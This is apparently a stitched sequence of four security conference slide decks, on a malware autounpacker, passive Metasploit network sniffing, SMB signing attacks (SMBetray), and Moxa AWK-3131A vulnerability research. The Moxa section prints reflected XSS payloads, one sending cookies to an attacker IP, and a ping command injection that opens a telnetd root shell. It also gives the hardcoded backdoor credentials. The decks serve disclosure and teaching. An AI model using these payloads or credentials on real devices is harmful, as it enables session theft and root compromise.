Dynamic Instrumentation Results • Generic Algorithm Described Previously works well • All address verified by manual unpacking • Addresses display clustering, which must be taken into account • Attach / Detach is effective for taking memory snapshots of an executable Offensive Computing - Malware Intelligence Dynamic Instrumentation Problems • Detectable – Memory checksums – Signature scanning • Extend this to work generically, non- detectably • Slow – ~1,000 times slower than native • Need faster implementation Offensive Computing - Malware Intelligence Towards a Solution • Core operating system component that: – Monitors all memory – Intercepts memory accesses – Fast Interception and Logging – Fundamental part of OS Offensive Computing - Malware Intelligence Introducing Saffron • Intel PIN and Hybrid Page Fault Handler • Extension of OllyBonE Kernel Code • Designed for 32-bit Intel x86 CPUs • Replaces Windows 0x0E Trap Handler • Logs memory accesses Offensive Computing - Malware Intelligence Offensive Computing - Malware Intelligence Virtual Memory Translation • Each process has its own memory • Memory must be translate from Virtual to Physical Address • Non-PAE 32bit Processors use 2 page indexes and a byte index • Each process has its own Page Directory Offensive Computing - Malware Intelligence Example Memory Translation Virtual Address 0 (LSB) 31 [Microsoft Windows Internals, Fourth Edition, Microsoft Press] CPU References Virtual Memory Address Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 [Microsoft Windows Internals, Fourth Edition, Microsoft Press] Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 PFN CR3 Page Directories (Contains the PDE) [Microsoft Windows Internals, Fourth Edition, Microsoft Press] CR3 contains process Page Directories Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 PFN PTE CR3 Page Directories (Contains the PDE) Page Tables (Contains the PTE) [Microsoft Windows Internals, Fourth Edition, Microsoft Press] Offensive Computing - Malware Intelligence Example Memory Translation Page Directory Index Page Table Index Virtual Page Number 10 Bits 10 Bits Byte Index 12 Bits 0 (LSB) 31 PFN PTE Address CR3 Desired Page Desired Byte Page Directories (Contains the PDE) Page Tables (Contains the PTE) Physical Address Space [Microsoft Windows Internals, Fourth Edition, Microsoft Press] Offensive Computing - Malware Intelligence MMU Data Structures • Page Directory Entry is hardware defined – Contains permissions, present bit, etc. • Page Table Entry also hardware defined – Permissions (Ring0 vs. all others) – Present bit (paged to disk or not) – “User” defined bits (for OS) Offensive Computing - Malware Intelligence Virtual Address Translation • TLB is major source of optimization • Hardware resolves as much as possible • Invokes page fault handler when – Page is not loaded in RAM – Incorrect privileges – Loaded, but mapped with demand paging – Address is not legal (out-of-range) • All indicated by special fields Offensive Computing - Malware Intelligence Intel TLB Implementation • Two TLBs maintained – Data - DTLB – Instructions – ITLB • ITLB more optimized than DTLB – Less lookups for ITLB == faster code – DTLB accessed less Offensive Computing - Malware Intelligence Offensive Computing - Malware Intelligence Process Monitoring • Overloading of supervisor bit in page fault handler • All process memory must be found • Iterate through all pages for a process – Windows application memory 0x00000000 – 0x7FFFFFFF • Mark supervisor bit on each valid PTE • Invalidate the page in the TLB with INVLPG • Hook heap allocation so new pages are watched Offensive Computing - Malware Intelligence Trap to Page Fault Handler • Determine if a watched process • Unset the supervisor bit • Loads the memory into the TLB • Resets supervisor bit Offensive Computing - Malware Intelligence Results • Memory accesses are visible • Reads, writes, and executes are exposed • Program execution can be tracked, controlled • Memory reads, writes are extremely apparent • Executions only show for each individual page Offensive Computing - Malware Intelligence Modifying the Autounpacker • Watch for written pages • Monitor for executions into that page • Mark page as Original Entry Point • Dump memory of the process Offensive Computing - Malware Intelligence Video Demo of Unpacking • Demonstrate Saffron Offensive Computing - Malware Intelligence Autounpacker Results • Effective method for bypassing debugger attacks – SEH decode problem is easily solved – Memory checksum • No process memory is modified • p0wn3d!!! • Shifting decode frame – Slight modification under development, but effective Offensive Computing - Malware Intelligence Future Work • Develop full-fledged API • Problems – Sometimes all page markings are lost – Still detectable at some level Offensive Computing - Malware Intelligence Questions? • Paper, presentation available at www.offensivecomputing.net
pdf
PIG: Finding Truffles Without Leaving A Trace Ryan Linn DEFCON 19 Copyright Trustwave 2010 Overview •  Introduction •  Why are we here ? •  How will this help me ? •  Talking is boring show me •  That’s neat, how does this work ? •  Protocols and Plugins •  Remediation Copyright Trustwave 2010 Introduction Ryan Linn / Senior Security Consultant at Trustwave •  Member of SpiderLabs team at Trustwave •  Contributor to Metasploit, BeEF, and other open source projects •  Interests: •  Process streamlining through tool integration, sharing knowledge, Metasploit, making security knowledge accessible •  Twitter: @sussurro •  Web: www.happypacket.net Copyright Trustwave 2010 Why are we here ? Passive Network Information Gathering •  Identify hosts/resources on a network •  Profile individuals/applications •  Determine network architecture •  Machine/domain/individual naming schemes Completely Silent •  No IP address required •  No Man-In-The-Middle required Copyright Trustwave 2010 Why are we here ? •  Understand what is on your network •  Deep Packet Parsing sounds like fun •  Make this information easier for everyone to access •  How to leverage this for pen tests •  Waiting here for the next talk.. Copyright Trustwave 2010 How will this help me? SysAdmin/User •  Know what traffic you are transmitting •  Are you tipping your hand by just being on the network ? Pen Tester •  Understand what information you can use to profile a network without anyone knowing you’re there Everyone •  Make this process easier •  Use Metasploit Database to help process/manage data •  Organize and manage results with Dradis •  How to stay quiet on a network Copyright Trustwave 2010 Talking is boring, show me Demo Time •  Demo 1 – Gathering Data •  Use Metasploit PIG modules to parse traffic and save data to the database •  Demo 2 – Viewing data with Metasploit •  Use Metasploit msfconsole to view collected data •  Demo 3 – Using Dradis to view information •  Import Metasploit data into Dradis to view data •  Demo 4 – PWN Plug and PIG Copyright Trustwave 2010 That’s neat, how does this work Metasploit framework plugin •  Core auxiliary module that handles sniffing Helper filters •  Series of individual filters that handle protocol parsing •  Each protocol sets sniffing parameters so that not everything goes to every filter Let’s take a look •  Demo time − Look at structure of building a simple parser Copyright Trustwave 2010 Dig Deeper Currently supported filters •  CDP •  DHCP Inform •  Dropbox •  Groove •  MDNS •  SMB •  SSDP Copyright Trustwave 2010 Dig Deeper CDP / Cisco Discovery Protocol •  OS Version •  IP address information •  VLAN Information •  Management Interface information •  VOIP vlans •  Can aid in VLAN Hopping Copyright Trustwave 2010 Dig Deeper DHCP Inform •  Not completed yet, but •  Will pull out: − Mac address − Hostname − Vendor class − Request list •  Together can be used to guess OS and Service Pack Copyright Trustwave 2010 Dig Deeper Dropbox •  Easily identify hosts using Dropbox •  Dropbox version •  Dropbox port •  Shared namespaces Copyright Trustwave 2010 Dig Deeper Groove •  Online/Offline status •  Groove Port •  All addresses on the system − Can be used to identify boxes with VMs, link hosts together •  Groove Version Copyright Trustwave 2010 Dig Deeper MDNS •  One of most interesting •  List open ports •  IP Addresses •  Peoples Names •  Active State of Machine •  Available Functionality Copyright Trustwave 2010 Dig Deeper SMB •  Host OS Version •  Server/Client Status •  Hostname •  Domain Name •  SQL Server ? Copyright Trustwave 2010 Dig Deeper SSDP / Simple Service Discovery Protocol (UPNP) •  AKA Network Plug and Play •  Printers •  Cameras •  Network Gateways Copyright Trustwave 2010 How do we fix it Netbios •  Disable Netbios over TCP SSDP •  Disable network plug and play CDP •  Enable it only where needed DHCP •  DHCP Helpers can limit where these packets go Dropbox •  Disable LAN Sync Groove •  Haven’t found a way MDNS •  Disable it when possible, may not always be an option Copyright Trustwave 2010 How to help Need more data •  Broadcast and Multicast traffic only DHCP Host ID More protocols Copyright Trustwave 2010 Future Add functionality to Meterpreter •  Meterpreter has sniffing capabilities, work on post module More protocols •  Collect data •  ??? •  Profit Better OS ID •  Improve guessing with DHCP Copyright Trustwave 2010 Resources Code •  http://www.happypacket.net/Defcon2011.tgz Metasploit •  http://www.metasploit.org Book •  Coding for Pen Testers comes out in Oct! Copyright Trustwave 2010 Questions Thanks for attending Thanks to DEFCON staff If you want to talk more head to follow-up room
pdf
quickbreach@defcon26:~# ./smbetray.py --help Backdooring & Breaking Signatures William Martin (@QuickBreach) > whoami • William Martin • OSCP • Penetration Tester • Supervisor at RSM US LLP in Charlotte, NC • Second time presenting at DEFCON • Twitter: @QuickBreach > Who is this talk for? • Red teamers looking to learn more about Active Directory, SMB security, and pick up new attacks against insecure SMB connections • Blue teamers that want to stop the red teamers from using what they learn • Anyone curious about how SMB signing actually works > Overview • Brief recap on what SMB is • NTLMv2 Relay attack • Investigate what SMB signing actually is • How else we can attack SMB? • Introduce SMBetray • Demo & tool release • Countermeasures • Credits Recap on SMB SMB server = Any PC receiving the SMB connection, not necessarily a Windows Server OS. Eg, a Windows 7 box can be the SMB server, as every Windows OS runs an SMB server by default SMB client = The PC/Server connecting to the SMB server > Terminology clarification > Recap on SMB (Source: https://docs.microsoft.com/en-us/windows/desktop/fileio/microsoft-smb-protocol-and-cifs-protocol- overview) > Recap on SMB SMB listens on TCP port 445 and allows for file sharing and management over the network, with features including: • Mapping network drives • Reading & writing files to shares • Authentication support • Providing access to MSRPC named pipes > What is SMB? > Recap on SMB Attackers love it for: • Pass-the-hash • System enumeration (authenticated, or null sessions) • Spidering shares & hunting for sensitive data, such as for the cpassword key in SYSVOL xml files > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? What I knew in the beginning: • Protects the integrity of SMB messages between the client and server, preventing any tampering • Is required by default on all domain controllers • Occurs after authenticated session setup • Stops my favorite attack > What is SMB signing? Lessons were learned – core concepts: At the end of the authentication phase in an authenticated session, the client and server will possess the same 16-byte SessionBaseKey. Depending on the dialect, the client and server may use this SessionBaseKey to generate subsequent keys each purposed for specific actions such as signing and encrypting SMB packets. Only those in possession of the keys can generate the appropriate signatures. > Sample signature > What is SMB signing? So, where does this SessionBaseKey come from – especially if we can manipulate the entire authentication process? Answer: The creation of the SessionBaseKey depends on the authentication mechanism used. > A walk through the NTLMv2 process > NTLMSSP Negotiate “Hello, I want to authenticate using NTLM” • No username/password/domain information in message • “Negotiate Key Exchange” is usually set. This means after the client authenticates and generates a SessionBaseKey, the client will generate a new random one, RC4 encrypt it with the old one, and send it to the server to use going forward. > NTLMSSP Challenge “Cool, hash your password & other data with this challenge” Contains: • Server challenge • Server information > NTLMSSP AUTH (Challenge-Response) “Sure, here’s everything” Contains: • Client username • Client domain • Client challenge • NtProofString • ResponseServerVersion • HiResponseServerVersion • A Timestamp (aTime) • Encrypted new SessionBaseKey (Probably) Great…so how is the SessionBaseKey generated? > First – A Brief HMAC/CMAC Refresher HMACs are keyed-hash message authentication code algorithms. Only those in possession of the private key, and the data, can generate the appropriate hash. These are used to verify the integrity of a message. CMACs are similar to HMACs with the exception that they’re based on cipher block algorithms like AES rather than hashing algorithms like MD5. Message = “Pineapple belongs on pizza” SecretKey = “IwillDieOnThisHill” HMAC_MD5(SecretKey, Message) = “34c5092a819022f7b98e51d3906ee7df” > SessionBaseKey Generation Let’s generate the SessionBaseKey from an NTLMv2 authentication process Step #1: NTResponse = HMAC_MD5(User’s NT Hash, username + domain) > SessionBaseKey Generation Step #2: basicData = serverChallenge + responseServerVersion + hiResponseServerVersion + '\x00' * 6 + aTime + clientChallenge + '\x00' * 4 + serverInfo + '\x00' * 4 NtProofString = HMAC_MD5(NTResponse, basicData) > SessionBaseKey Generation Step #3 (Last Step): SessionBaseKey = HMAC_MD5(NTResponse, NtProofString) > SessionBaseKey Generation Put together: NTResponse = HMAC_MD5(User’s NT Hash, username + domain) basicData = serverChallenge + responseServerVersion + hiResponseServerVersion + '\x00' * 6 + aTime + clientChallenge + '\x00' * 4 + serverInfo + '\x00' * 4 NtProofString = HMAC_MD5(NTResponse, basicData) SessionBaseKey = HMAC_MD5(NTResponse, NtProofString) So what information do we NOT have? > SessionBaseKey Generation Put together: NTResponse = HMAC_MD5(User’s NT Hash, username + domain) basicData = serverChallenge + responseServerVersion + hiResponseServerVersion + '\x00' * 6 + aTime + clientChallenge + '\x00' * 4 + serverInfo + '\x00' * 4 NtProofString = HMAC_MD5(NTResponse, basicData) SessionBaseKey = HMAC_MD5(NTResponse, NtProofString) NTLM key logic: User’s password -> Users’ NT Hash -> (Combined with challenge & auth data) -> SMB SessionBaseKey If the user’s password is known, SMB signatures can be forged > SessionBaseKey Generation > SessionBaseKey Generation If “Negotiate Key Exchange” is set, then the client generates an entirely random new SessionBaseKey, RC4 encrypts it with the original SessionBaseKey, and sends it in the NTLMSS_AUTH request in the “SessionKey” field. NTLM key logic with “Negotiate Key Exchange” : User’s password -> Users’ NT Hash -> (Combined with challenge & auth data) -> SMB SessionBaseKey -> SMB Exchanged SessionKey (becomes new SessionBaseKey) > SessionBaseKey Generation To fill in the blanks from the NTLMv2 relay attack presented earlier > The (now obvious) missing piece of the puzzle The DC takes in the challenge and the challenge response to generate the SessionBaseKey, and then sends it to the server through a required secure & encrypted channel. This secure channel is established by the NETLOGON service on a domain connected PC at startup, and the underlying authentication protecting it is the password for the machine account itself. > The (now obvious) missing piece of the puzzle But wait, what about Kerberos? > What about Kerberos? The SessionBaseKey is the ServiceSessionKey in the TGS response. Key logic: User’s plaintext password -> Kerberos Session Key -> Service Session Key (inside TGS) > What about Kerberos? If mutual authentication is used, the server will reply with a new SessionBaseKey which is encrypted with the previous one. Key logic: User’s plaintext password -> Kerberos Session Key -> Service Session Key (inside TGS) -> New Service Session Key (inside AP_REP) > Signing the packet Once we have the SessionBaseKey, we can sign the packet SMB 1.0 Signature = HMAC_MD5(SessionBaseKey, SMBPacket) SMB 2.0.2 & 2.1.0 Only the first 16 bytes of the hash make up the signature Signature = HMAC_SHA256(SessionBaseKey, SMBPacket) SMB 3.0.0, 3.0.2 & 3.1.1 A special signing key is derived from the SessionBaseKey Signature = CMAC_AES128(SigningKey, SMBPacket) > Attacking SMB So, what happens when we know the SessionBaseKey, or when signing is not required at all per the default settings? HTTP before HTTPS > Attacking SMB > Attacking SMB - If encryption is not used • Steal copies of files passed over the wire in cleartext - If signing is not used • Replace every file with an identical LNK that executes our code • Swap out the contents of any legitimate file with our own malicious one of the same file-type • Inject fake files into directory listings (for social engineering) - If signing is used, and the attacker knows the key • All above + backdoor any logon scripts & SYSVOL data we can (Defaults) SMB1: Client supports it, server doesn’t. Unless they both support it, or one requires it, no signing will be used. (Defaults) SMB2/3: Server & client support it, but don’t require it. Unless someone requires it, signing is not used. > Attacking SMB (Defaults) SMB1: No encryption support (Defaults) SMB2/3: Encryption was introduced in SMB3 but must be manually enabled or required > Attacking SMB Non-DC Machines SMB1 Client Signing SMB1 Server Signing SMB2/3 Client Signing SMB2/3 Server Signing Highest Version Windows Vista SP1 Supported, Not required Disabled Not required Not required 2.0.2 Windows 7 Supported, Not required Disabled Not required Not required 2.1.0 Windows 8 Supported, Not required Disabled Not required Not required 3.0.0 Windows 8.1 Supported, Not required Disabled Not required Not required 3.0.2 Windows 10* Supported, Not required Disabled Not required Not required 3.1.1 Server 2008 Supported, Not required Disabled Not required Not required 2.0.2 Server 2008 R2 Supported, Not required Disabled Not required Not required 2.1.0 Server 2012 Supported, Not required Disabled Not required Not required 3.0.0 Server 2012 R2 Supported, Not required Disabled Not required Not required 3.0.2 Server 2016* Supported, Not required Disabled Not required Not required 3.1.1 - Domain controllers require SMB signing by default. - In Windows 10 and Server 2016, signing and mutual authentication (ie. Kerberos auth) is always required on \\*\SYSVOL and \\*\NETLOGON These default settings are enforced through UNC hardening > Notable Exceptions - If a client supports SMB3, and the dialect picked for the connection is SMB 2.0.2 -> 3.0.2, the client will always send a signed FSCTL_VALIDATE_NEGOTIATE_INFO message to validate the negotiated “Capabilities, Guid, SecurityMode, and Dialects” from the original negotiation phase – and require a signed response. This feature cannot be disable in Windows 10/Server 2016 and later. This prevents dialect downgrades (except to SMBv1), and stripping any signature/encryption support. > Notable Exceptions SMB 3.1.1 is a security beast. It leverages pre-authentication integrity hashing to verify that all information prior to authentication was not modified. In a nutshell: It takes the cumulative SHA-512 hash of the every SMB packet prior to authentication, and uses it in the SessionBaseKey generation process. If any data was modified, then the client and server will not generate the same signing keys. At the end of the session setup response, both client and server must send a signed message to prove integrity. > Notable Exceptions • Signing is not used by default except on DCs, and when W10/Server2016 connect to \\*\NETLOGON and \\*\SYSVOL • Encryption is only supported in SMB 3.0.0 and greater, and must be enabled or required manually. • Every dialect up except for SMB 3.1.1 can be downgraded to NTLMv2 if it is supported. • Signing and encryption keys are, at their root, based on knowledge of the user’s password. > Recap Introducing SMBetray > Attacking SMB The goal was to build a tool to take full advantage of the gaps in security of weak SMB sessions from a true MiTM perspective. Primary objectives were to steal sensitive data, and gain RCE > SMBetray Biggest obstacle: Putting the tool in the ideal position for intercept. The ideal position was a fully transparent intercept/proxy that, when a victim routes all traffic through us, would transparently eavesdrop on the connection between the victim and their actual legitimate destination. > SMBetray Existing options provided two possibilities:* 1. Use of an arbitrary upstream server 2. Use of NFQUEUE to edit the packets at the kernel level *Note: I did not flip the Internet upside down searching for the perfect solution Use of pre-configured upstream server > SMBetray Use of a pre-configured upstream server Pros: - Connection stability Cons: - You’re most likely redirecting the requests of your victim somewhere other than where they meant to go. This causes disruptions, and doesn’t provide the true “transparent” MiTM setup desired. Once the data is re-directed through iptables, we lose the original “destination” information, so we can’t determine where the victim was originally sending the request. (HTTP MiTM servers avoid this issue by grabbing the “Host:” info from the header) Use of Kernel level NFQUEUE packet editing > SMBetray Use of a NFQUEUE Pros: - Full transparency, as packets aren’t redirected – they’re edited on the fly at the kernel level Cons: - This level of TCP packet editing takes too long (from a TCP timeout perspective). This quickly leads to TCP re-transmission snowballing, and connections resetting. Solution? Combine them > SMBetray Created ebcLib.py as a MiTM TCP proxy with the useful transparency of an NFQUEUE intercept, with the connection stability of an upstream MiTM proxy. SMBetray is built on top of this library. Anatomy of a new connection in ebcLib.py Anatomy of an existing/established connection in ebcLib.py > SMBetray Now that we can put ourselves where we want, lets start attacking SMB SMBetray runs the below attacks: • Dialect downgrading & Authentication mechanism downgrading • Passive file copying • File directory injection • File content swapping/backdooring • Lnk Swapping • Compromise SessionKeys (if we have creds) & forge signatures SMBetray Sample SMBetray Sample SMBetray Sample SMBetray Sample Demo Github.com/QuickBreach/SMBetray.git Countermeasures > Countermeasures: Disable SMBv1 Require SMB signatures across the domain on both clients and servers by enabling “Digitally sign communications (always)” > Countermeasures: Require SMB Signing > Countermeasures: Require SMB Signing SMB 3 introduced support for encryption, which can be established on a per-share basis, or be implemented system-wide. Encryption can either be “supported”, or “required”. If an SMB 3 server supports encryption, it will encrypt any session after authentication with an SMB 3 client, but not reject any un- encrypted connection with lesser versions of SMB If an SMB 3 server requires encryption, it will reject any un- encrypted connection. > Countermeasures: Use Encryption UNC hardening is a feature available in Group Policy that allows administrators to push connection security requirements to clients if the UNC the client is connecting to matches a certain pattern. These requirements include only supporting mutual authentication, requiring SMB signing, and requiring encryption. Eg. “RequireIntegrity=1” on “\\*\NETLOGON” will ensure that, regardless of the security requirements reported by the server, the client will only connect to the NETLOGON share if signing is used. > Countermeasures: Use UNC Hardening > Countermeasures: Audit & Restrict NTLM Audit where NTLM is needed in your organization, and restrict it to those systems where it is needed. Removing, or at least restricting NTLM in the environment, will aid in preventing authentication mechanism downgrades to NTLMv1/v2 for SMB dialects less than 3.1.1. The pre- authentication integrity hash in 3.1.1 protects its authentication mechanisms, but this check only occurs after authentication – which means an attacker would have already captured the NTLMv2 hashes to crack, even though the SMB 3.1.1 connection will be terminated. > Countermeasures: Kerberos FAST Armoring > Countermeasures: Kerberos FAST Armoring Require Kerberos Flexible Authentication via Secure Tunneling (FAST) - The user’s Kerberos AS-REQ authentication is encapsulated within the machine’s TGT. This prevents an attacker who knows the user’s password from compromising that user’s Kerberos session key. This also prevents attackers from cracking AS-REP’s to compromise user passwords - This feature enables authenticated Kerberos errors, preventing KDC error spoofing from downgrading clients to NTLM or weaker cryptography. > Countermeasures: Kerberos FAST Armoring PRECAUTIONS WHEN REQUIRING FAST: Armoring requires Windows 8/2012, or later, throughout the environment. If FAST Armoring is required, and thereby set to “Fail unarmored authentication requests”, any older and non-FAST supporting devices will no longer be able to authenticate to the domain – and be dead in the water. Review documentation & your environment thoroughly before requiring this setting > Countermeasures: Passphrase not Password Push users to the passphrase from the password mindset BAD: D3fc0n26! GOOD: “5ome some stronger p@ssword!” If we can’t crack the password in the first place, we can’t compromise Kerberos Session Keys or SMB Session Base Keys > Contributors & Shoulders of Giants > Contributors & Shoulders of Giants Ned Pyle (@NerdPyle) Principal Program Manager in the Microsoft Windows Server High Availability and Storage Group at Microsoft - Verified authenticity of SMB protections and behaviors Mathew George Principal Software Engineer in the Windows Server Group at Microsoft - Verified authenticity of SMB protections and behaviors Special thanks to CoreSecurity for the impacket libraries > \x00 Thank you DEFCON 26! https://github.com/QuickBreach/SMBetray.git William Martin @QuickBreach
pdf
P R O T E C T I N G Y O U R N E T W O R K Patrick DeSantis | @pat_r10t FROM BOX TO BACKDOOR U s i n g O l d S c h o o l To o l s a n d Te c h n i q u e s t o D i s c o v e r B ac k doors in Modern Dev ic es Patrick DeSantis | @pat_r10t OVERVIEW INTRO: WHO, WHAT, WHY MOXA AWK3131A WAP MOXA WAP: ABOUT “The AWK-3131A is 802.11n compliant to deliver speed, range, and reliability to support even the most bandwidth-intensive applications. The 802.11n standard incorporates multiple technologies, including Spatial Multiplexing MIMO (Multi-In, Multi-Out), 20 and 40 MHz channels, and dual bands (2.4 GHz and 5 GHz) to provide high speed wireless communication, while still being able to communicate with legacy 802.11a/b/g devices. The AWK's operating temperature ranges from -25 to 60°C for standard models and -40 to 75°C for wide temperature models, and is rugged enough for all types of harsh industrial environments. Installation of the AWK is easy using DIN-Rail mounting or distribution boxes, and with its wide operating temperature range, IP30-rated housing with LED indicators, and DIN-Rail mounting it is a convenient yet reliable solution for all types of industrial wireless applications.” - Moxa MOXA WAP: ABOUT TL;DR •  It’s an 802.11n Wireless Access Point (WAP) –  in a din rail mountable enclosure –  many of the the parts inside are the same as in common SOHO networking devices •  Moxa advertises that the AWK series is –  "a Perfect Match for Your AGV & AS/RS Systems” •  Automated Guided Vehicles (AGV) •  Automated Storage and Retrieval System (AS/RS) –  common in Automated Materials Handling (AMH) systems. MOXA WAP: ABOUT •  It’s “Unbreakable” –  challenge accepted MOXA WAP: DEVICE LIMITATIONS •  Limited to about 8k connections per some unit of time –  lots of resource exhaustion DoS issues –  throttle traffic or wait for recovery •  Crashes… a lot •  No legit operating system access •  Very limited shell environment –  most management and configuration done via web app •  Crashes… A LOT –  so many crashes… –  usually needs a reboot to recover •  later, we’ll have access to crash dumps and see a lot of these crashes are seg faults (want some CVEs?) MOXA WAP: DEVICE LIMITATIONS MOXA WAP: DEVICE LIMITATIONS CVE-2016-8723 Moxa AWK-3131A HTTP GET Denial of Service Vulnerability MOXA WAP: FIRMWARE ANALYSIS MOXA WAP: FIRMWARE ANALYSIS MOXA WAP: SCAN AND ENUM 22/tcp & &open&& &ssh&Dropbear&sshd&0.53& 23/tcp & &open&& &telnet&BusyBox&telnetd& 80/tcp & &open&& &http&GoAhead&WebServer& 443/tcp& &open&& &ssl/http&GoAhead&WebServer& 5801/tcp& &open&& &Moxa&serviceAgent&(TCP)& 5800/udp& &open & &Moxa&serviceAgent&(UDP)& MOXA WAP: WEB APP MOXA WAP: WEB APP MOXA WAP: WEB APP MOXA WAP: WEB APP - NONCE •  cryptographic nonce: –  In crypto, a Number used ONCE –  Uses •  prevents replay attacks •  as a pseudo random IV •  a salt in hashing algorithms •  not the Urban Dictionary definition of nonce –  “(UK) Slang for paedophile.” (sic) MOXA WAP: WEB APP – SESSION MOXA WAP: WEB APP - FREEZE NONCE MOXA WAP: WEB APP - FREEZE NONCE CVE-2016-8712 Moxa AWK-3131A Web Application Nonce Reuse Vulnerability MOXA WAP: WEB APP - FIX SESSION •  The session token is calculated: –  token = MD5( password + nonce ) •  The device has only: –  1 user (admin) – effectively, there are no users –  1 password (default is “root”) –  1 nonce (only changes after 5 mins of inactivity) THERE IS ONLY 1 VALID SESSION TOKEN AT A TIME! MOXA WAP: WEB APP - XSS MOXA WAP: WEB APP - XSS •  /client_list.asp&[devIndex&parameter]& –  devIndex=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& •  /multiple_ssid_set.asp&[devIndex&parameter]& –  devIndex=wireless_cert.asp? index=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& •  /wireless_cert.asp&[index&parameter]& –  wireless_cert.asp? index=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& •  /wireless_security.asp&[vapIndex&parameter]& –  vapIndex=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& CVE-2016-8719 Moxa AWK-3131A Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities MOXA WAP: WEB APP - XSS MOXA WAP: WEB APP - XSS & http://<device&IP>/wireless_cert.asp?index=? index=%22%3E%3Cscript%3Ewindow.location=%22http ://<attacker&ip>/test? cookie=%22.concat%28document.cookie%29%3C/ script%3E& MOXA WAP: WEB APP - XSS MOXA WAP: WEB APP - XSS •  We have –  user name (hardcoded) –  nonce (frozen) –  session token (stolen cookie) •  We can easily crack password –  it’s just MD5( password + nonce ) •  But, we don’t need the password –  the nonce isn’t changing –  our session token will never become invalid MOXA WAP: SESSION HIJACK MOXA WAP: WEB APP – OS CMD INJ CVE-2016-8721 Moxa AWK-3131A Web Application Ping Command Injection Vulnerability MOXA WAP: WEB APP – OS CMD INJ ;&/bin/busybox&telnetd&-l/bin/sh&-p9999& MOXA WAP: WEB APP – OS CMD INJ MOXA WAP: GET BINARIES MOXA WAP: WEB APP - CSRF cve MOXA WAP: WEB APP - CSRF MOXA WAP: BACKDOOR q  94jo3dkru4:Zg5SOmmQKk3kA:0:0:root:/:/bin/sh& & q  daccli:$1$$oCLuEVgI1iAqOA8pwkzAg1:0:0:root:/:/usr/sbin/daccli& & q  netdump:x:34:34:Network&Crash&Dump&user:/var/crash:/bin/bash& & q  mysql:x:27:27:MySQL&Server:/var/lib/mysql:/bin/bash& & q  admin:ZH0m6QMdLV0Wo:0:0:root:/:/usr/sbin/iw_console& & q  art::0:0:art&calibration:/:/etc/art_shell.sh& MOXA WAP: BACKDOOR ü  94jo3dkru4:Zg5SOmmQKk3kA:0:0:root:/:/bin/sh& & q  daccli:$1$$oCLuEVgI1iAqOA8pwkzAg1:0:0:root:/:/usr/sbin/daccli& & q  netdump:x:34:34:Network&Crash&Dump&user:/var/crash:/bin/bash& & q  mysql:x:27:27:MySQL&Server:/var/lib/mysql:/bin/bash& & q  admin:ZH0m6QMdLV0Wo:0:0:root:/:/usr/sbin/iw_console& & q  art::0:0:art&calibration:/:/etc/art_shell.sh& MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR & $&strings&iw_doConfig&|&grep&moxa& …&<snip>&…& echo&"94jo3dkru4:moxaiw%s"&|&/sbin/chpasswd& /bin/passwd&-u&94jo3dkru4&-p&"moxaiw%s"& MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR •  Sets admin user’s password –  We know admin password is “root” •  Sets 94jo3dkru4 user’s password –  Doesn’t change the value being passed to %s –  “moxaiw%s” becomes “moxaiwroot” •  This is hard-coded in an initialization binary –  runs every time the device boots MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR We have an operating system root-level backdoor!!! CVE-2016-8717 Moxa AWK-3131A Hard-coded Administrator Credentials Vulnerability MOXA WAP: BACKDOOR & iw_system((int32_t)"iw_onekey&%s&&");& iw_system((int32_t)"killall&-2&%s");& iw_system((int32_t)"ping&-c&4&%s&1>/var/pingtestlog.txt&2>&1");& & iw_system((int32_t)"openssl&aes-256-cbc&-d&-k&moxaiwroot& -salt&-in&%s&-out&%s");& & iw_system((int32_t)"rm&%s");& iw_system((int32_t)"echo&Import&Fail&>&%s");& iw_system((int32_t)"touch&%s%s");& iw_system((int32_t)"cd&%s&&&&tftp&-p&-r&%s&%s&&&&echo&$?&>&%s");& iw_system((int32_t)"echo&\"TFTP&Server&no&response\"&>&%s");& iw_system((int32_t)"rm&%s%s");& MOXA WAP: ATTACK SUMMARY Freeze Nonce XSS Session Hijack CSRF Command Injection Busybox Telnet Root Backdoor MOXA WAP: NOW WHAT? •  We already have OS root •  It’s a “read-only” file system •  We already grabbed all the binaries and configs •  We could install a backdoor –  but it already has one •  Lots of binaries already on device can be used to do fun things MOXA WAP: NOW WHAT? 80211debug&&&&&&&&&&&&&crontab&&&&&&&&&&&&&&&&find&&&&&&&&&&&&&&&&&&&ip&&&&&&&&&&&&&&&&&&&&&iw_testDevio&&&&&&&&&&&mdev&&&&&&&&&&&&&&&&&&&pwdx&&&&&&&&&&&&&&&&&&&start-stop-daemon&&&&&&uptime& 80211stats&&&&&&&&&&&&&cryptpw&&&&&&&&&&&&&&&&flock&&&&&&&&&&&&&&&&&&ipaddr&&&&&&&&&&&&&&&&&iw_testDo&&&&&&&&&&&&&&mesg&&&&&&&&&&&&&&&&&&&radartool&&&&&&&&&&&&&&stty&&&&&&&&&&&&&&&&&&&users& [&&&&&&&&&&&&&&&&&&&&&&cttyhack&&&&&&&&&&&&&&&fold&&&&&&&&&&&&&&&&&&&ipcrm&&&&&&&&&&&&&&&&&&iw_troubleshoot&&&&&&&&microcom&&&&&&&&&&&&&&&rdate&&&&&&&&&&&&&&&&&&su&&&&&&&&&&&&&&&&&&&&&usleep& [[&&&&&&&&&&&&&&&&&&&&&cut&&&&&&&&&&&&&&&&&&&&free&&&&&&&&&&&&&&&&&&&ipcs&&&&&&&&&&&&&&&&&&&iw_typeSizeEnumerator&&mkdir&&&&&&&&&&&&&&&&&&readahead&&&&&&&&&&&&&&sulogin&&&&&&&&&&&&&&&&vconfig& 